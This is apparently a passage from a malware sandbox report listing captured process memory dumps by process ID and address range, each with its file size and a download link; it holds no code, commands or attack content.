memory/3016-1712-0x0000000003AD0000-0x0000000003B34000-memory.dmp

Filesize
400KB

Download
memory/3016-1715-0x0000000003AD0000-0x0000000003B34000-memory.dmp

Filesize
400KB

Download
memory/3016-1713-0x0000000003AD0000-0x0000000003B34000-memory.dmp

Filesize
400KB

Download
memory/3016-1711-0x0000000003AD0000-0x0000000003B34000-memory.dmp

Filesize
400KB

Download
memory/3020-1212-0x0000000000400000-0x00000000008C1000-memory.dmp

Filesize
4.8MB

Download
memory/3020-405-0x0000000000400000-0x00000000008C1000-memory.dmp

Filesize
4.8MB

Download
memory/3020-1866-0x0000000000400000-0x00000000008C1000-memory.dmp

Filesize
4.8MB

Download
memory/3020-1714-0x0000000000400000-0x00000000008C1000-memory.dmp

Filesize
4.8MB

Download
memory/3020-302-0x0000000000400000-0x00000000008C1000-memory.dmp

Filesize
4.8MB

Download
memory/3020-491-0x0000000000400000-0x00000000008C1000-memory.dmp

Filesize
4.8MB

Download
memory/3020-2025-0x0000000000400000-0x00000000008C1000-memory.dmp

Filesize
4.8MB

Download
memory/3020-304-0x0000000000400000-0x00000000008C1000-memory.dmp

Filesize
4.8MB

Download
memory/3092-687-0x00007FF736560000-0x00007FF736AB1000-memory.dmp

Filesize
5.3MB

Download
memory/3204-1571-0x0000000000A10000-0x0000000000AAE000-memory.dmp

Filesize
632KB

Download
memory/3204-1574-0x00007FFC82710000-0x00007FFC82905000-memory.dmp

Filesize
2.0MB

Download
memory/3204-1573-0x000000006E830000-0x000000006E87F000-memory.dmp

Filesize
316KB

Download
memory/3204-1572-0x0000000000AB0000-0x0000000000CED000-memory.dmp

Filesize
2.2MB

Download
memory/3208-1719-0x0000000000ED0000-0x0000000001395000-memory.dmp

Filesize
4.8MB

Download
memory/3208-155-0x0000000000ED0000-0x0000000001395000-memory.dmp

Filesize
4.8MB

Download
memory/3208-307-0x0000000000ED0000-0x0000000001395000-memory.dmp

Filesize
4.8MB

Download
memory/3208-425-0x0000000000ED0000-0x0000000001395000-memory.dmp

Filesize
4.8MB

Download
memory/3208-66-0x0000000000ED0000-0x0000000001395000-memory.dmp

Filesize
4.8MB

Download
memory/3208-1908-0x0000000000ED0000-0x0000000001395000-memory.dmp

Filesize
4.8MB

Download
memory/3208-598-0x0000000000ED0000-0x0000000001395000-memory.dmp

Filesize
4.8MB

Download
memory/3208-1347-0x0000000000ED0000-0x0000000001395000-memory.dmp

Filesize
4.8MB

Download
memory/3208-48-0x0000000000ED0000-0x0000000001395000-memory.dmp

Filesize
4.8MB

Download
memory/4080-423-0x0000000000400000-0x0000000000464000-memory.dmp

Filesize
400KB

Download
memory/4080-422-0x0000000000400000-0x0000000000464000-memory.dmp

Filesize
400KB

Download
memory/4552-16-0x0000000005530000-0x0000000005884000-memory.dmp

Filesize
3.3MB

Download
memory/4552-24-0x0000000007E60000-0x0000000008404000-memory.dmp

Filesize
5.6MB

Download
memory/4552-23-0x0000000006F60000-0x0000000006F82000-memory.dmp

Filesize
136KB

Download
memory/4552-22-0x0000000006FD0000-0x0000000007066000-memory.dmp

Filesize
600KB

Download
memory/4552-19-0x0000000007230000-0x00000000078AA000-memory.dmp

Filesize
6.5MB

Download
memory/4552-20-0x0000000006030000-0x000000000604A000-memory.dmp

Filesize
104KB

Download
memory/4552-4-0x0000000004B50000-0x0000000004B72000-memory.dmp

Filesize
136KB

Download
memory/4552-3-0x0000000004DB0000-0x00000000053D8000-memory.dmp

Filesize
6.2MB

Download
memory/4552-18-0x0000000005B30000-0x0000000005B7C000-memory.dmp

Filesize
304KB

Download
memory/4552-17-0x0000000005B00000-0x0000000005B1E000-memory.dmp

Filesize
120KB

Download
memory/4552-2-0x00000000021D0000-0x0000000002206000-memory.dmp

Filesize
216KB

Download
memory/4552-6-0x00000000054C0000-0x0000000005526000-memory.dmp

Filesize
408KB

Download
memory/4552-5-0x0000000005450000-0x00000000054B6000-memory.dmp

Filesize
408KB

Download
memory/4844-1766-0x0000000000ED0000-0x0000000001395000-memory.dmp

Filesize
4.8MB

Download
memory/4848-447-0x0000000000400000-0x0000000000464000-memory.dmp

Filesize
400KB

Download
memory/4848-448-0x0000000000400000-0x0000000000464000-memory.dmp

Filesize
400KB

Download
memory/4932-47-0x0000000000530000-0x00000000009F5000-memory.dmp

Filesize
4.8MB

Download
memory/4932-32-0x0000000000530000-0x00000000009F5000-memory.dmp

Filesize
4.8MB

Download
memory/5016-1710-0x00000000005F0000-0x0000000000A9A000-memory.dmp

Filesize
4.7MB

Download
memory/5016-1718-0x00000000005F0000-0x0000000000A9A000-memory.dmp

Filesize
4.7MB

Download
memory/5224-2023-0x0000000000400000-0x0000000000463000-memory.dmp

Filesize
396KB

Download
memory/5224-2022-0x0000000000400000-0x0000000000463000-memory.dmp

Filesize
396KB

Download
memory/5520-64-0x0000000000400000-0x0000000000464000-memory.dmp

Filesize
400KB

Download
memory/5520-63-0x0000000000400000-0x0000000000464000-memory.dmp

Filesize
400KB

Download
memory/5580-1587-0x00007FFC82710000-0x00007FFC82905000-memory.dmp

Filesize
2.0MB

Download
memory/5580-1810-0x000000006E830000-0x000000006E87F000-memory.dmp

Filesize
316KB

Download
memory/5580-1584-0x00000000004A0000-0x000000000053E000-memory.dmp

Filesize
632KB

Download
memory/5580-1585-0x0000000000820000-0x0000000000A5D000-memory.dmp

Filesize
2.2MB

Download
memory/5580-1586-0x000000006E830000-0x000000006E87F000-memory.dmp

Filesize
316KB

Download
memory/5780-1898-0x0000000003190000-0x0000000003590000-memory.dmp

Filesize
4.0MB

Download
memory/5780-1899-0x00007FFC82710000-0x00007FFC82905000-memory.dmp

Filesize
2.0MB

Download
memory/5780-1901-0x0000000077000000-0x0000000077215000-memory.dmp

Filesize
2.1MB

Download
memory/5780-1860-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/5780-1859-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/5780-1897-0x0000000003190000-0x0000000003590000-memory.dmp

Filesize
4.0MB

Download
memory/5856-195-0x000001D0A43F0000-0x000001D0A4412000-memory.dmp

Filesize
136KB

Download
memory/6028-1909-0x00007FF6F16D0000-0x00007FF6F1C21000-memory.dmp

Filesize
5.3MB

Download
memory/6028-546-0x00007FF6F16D0000-0x00007FF6F1C21000-memory.dmp

Filesize
5.3MB

Download
memory/6028-424-0x00007FF6F16D0000-0x00007FF6F1C21000-memory.dmp

Filesize
5.3MB

Download
memory/6028-305-0x00007FF6F16D0000-0x00007FF6F1C21000-memory.dmp

Filesize
5.3MB

Download
memory/6028-1720-0x00007FF6F16D0000-0x00007FF6F1C21000-memory.dmp

Filesize
5.3MB

Download
memory/6028-2024-0x00007FF6F16D0000-0x00007FF6F1C21000-memory.dmp

Filesize
5.3MB

Download
memory/6028-1285-0x00007FF6F16D0000-0x00007FF6F1C21000-memory.dmp

Filesize
5.3MB

Download
memory/7304-27680-0x0000000000E30000-0x00000000012E2000-memory.dmp

Filesize
4.7MB

Download
memory/7304-27683-0x0000000000E30000-0x00000000012E2000-memory.dmp

Filesize
4.7MB

Download
memory/7768-27685-0x0000000000ED0000-0x0000000001395000-memory.dmp

Filesize
4.8MB

Download